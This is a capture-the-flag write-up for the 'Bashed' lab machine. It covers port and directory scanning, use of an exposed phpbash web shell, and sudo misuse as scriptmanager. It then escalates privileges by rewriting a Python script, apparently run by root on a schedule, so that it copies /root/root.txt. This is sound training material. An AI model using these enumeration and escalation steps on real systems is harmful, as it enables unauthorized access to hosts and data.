Summary

  • Do some simple HTTP enumeration to find a custom php script
  • Use the phpbash.php script grab user and root flag

First I start with an nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-16 15:48 EDT
Nmap scan report for 10.10.10.68
Host is up (0.053s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.28 seconds


Only one port this time. Navigating to the webpage I see a nice custom webpage. A quick look aorund does reveal anything obvious

Running a gobuster reveals some directories.

/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)


Quite a few options but the one that is interesting to us is the /dev directory. Navigating to the directory I will see two files. phpbash.min.php and phpbash.php

Doesnt matter which file you choose, both of them give you a custom bash shell written in php.

At this point you can grab the user flag located in /user/arrexel.

Now time to get the root flag. Running a quick sudo -l I see that the I can run sudo asa the user scriptmanager.

www-data@bashed
:/var/www/html/dev# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL


Doing some basic enumeration around the box I noticed a strange directory name /scripts which is not there by default. A quick permissions check reveals that the directory is indeed owned by the user scriptmanager. Currently as the user www-data I can see there are two files in there but I are unable to read them. This is where I will use scriptmanagers sudo priviledges

www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.txt
testing 123!

Looking at both the files I can come to the conclusion that there is probably a process executing test.py and sending the output to test.txt.

What I are going to do is edit the test.py script to copy the contents of the root.txt file into the test.txt so I can then read it. This can be achieved with the short script below

f = open("test.txt", "w")
r = open("/root/root.txt", "r")
re = r.readline()
f.write(re)

Now I wait for the new file to execute and if you did everything correctly than you should be able to get the root flag by reading the /scripts/test.txt file.